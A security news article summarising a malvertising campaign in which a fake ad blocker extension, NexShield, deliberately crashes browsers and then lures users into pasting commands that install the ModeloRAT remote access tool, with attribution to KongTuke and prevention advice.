Fake Ad Blocker Extension Crashes Browsers in ClickFix Attacks
▼ Summary
– A malicious ad-blocking extension called NexShield crashes browsers by creating an infinite loop, forcing a restart to trigger a deceptive “CrashFix” attack.
– The attack uses a fake pop-up to trick users into running malicious commands that download and execute a Python-based remote access tool called ModeloRAT.
– ModeloRAT targets corporate environments, performing reconnaissance, executing commands, and modifying systems, while home users receive a test payload.
– The campaign is attributed to a threat actor named KongTuke, who is evolving to target more lucrative enterprise networks.
– Prevention requires understanding commands before execution and installing extensions only from trusted sources, while infected users need a full system cleanup.
A recent malvertising campaign is deploying a deceptive browser extension to intentionally crash Chrome and Edge, setting the stage for a sophisticated social engineering attack. This malicious tool, named NexShield, was fraudulently marketed as a legitimate ad blocker created by the developer of the popular uBlock Origin. Once installed, it triggers a real browser crash, a tactic researchers call ‘CrashFix,’ which is a new variant of the known ‘ClickFix’ attack method.
The extension, which has since been removed from the Chrome Web Store, was promoted as a privacy-focused, lightweight solution. In reality, it functions as a denial-of-service weapon against the browser itself. It creates an infinite loop of ‘chrome.runtime’ port connections, exhausting memory and causing frozen tabs, spiked CPU and RAM usage, and eventual browser failure. Users are forced to terminate the process via the Windows Task Manager.
The attack unfolds when the browser is restarted. The extension displays a convincing pop-up warning of system issues and urges the user to run a scan. This action opens a new window with a fabricated security alert, complete with instructions to fix the supposed problem. Following the classic ClickFix pattern, the malicious extension copies a command to the clipboard and tells the user to paste and execute it in the Windows Command Prompt.
This command initiates a chain that downloads and runs an obfuscated PowerShell script from a remote server. To avoid immediate detection, the payload is programmed with a 60-minute delay after the extension is installed. The final stage differs based on the victim’s environment. For corporate systems on a domain network, the attackers deploy a powerful remote access tool called ModeloRAT.
This Python-based ModeloRAT is capable of extensive system reconnaissance, executing commands, modifying the Windows Registry, deploying additional payloads, and self-updating. For non-domain systems, typically home users, the command server in this campaign returned only a test message, suggesting these targets were a lower priority or that the attack was still being refined.
This CrashFix method represents an escalation from previous ClickFix campaigns, which often simulated problems like a fake Blue Screen of Death within the browser. The key difference here is that the browser crash is genuine, making the subsequent fake security warning far more persuasive and alarming to the victim.
Security analysts attribute this specific campaign to a threat actor tracked as ‘KongTuke,’ whose activities have been monitored since early 2025. The deployment of ModeloRAT against corporate networks indicates this group is evolving and showing increased interest in more lucrative enterprise targets.
Protecting against these attacks requires vigilance. Users should never run commands from an untrusted source, especially when prompted by a browser pop-up after a crash. It is critical to only install browser extensions from verified and reputable publishers. Anyone who installed the NexShield extension must perform a comprehensive system scan, as simply removing the extension does not eliminate deeper payloads like ModeloRAT that may have been installed.
(Source: Bleeping Computer)
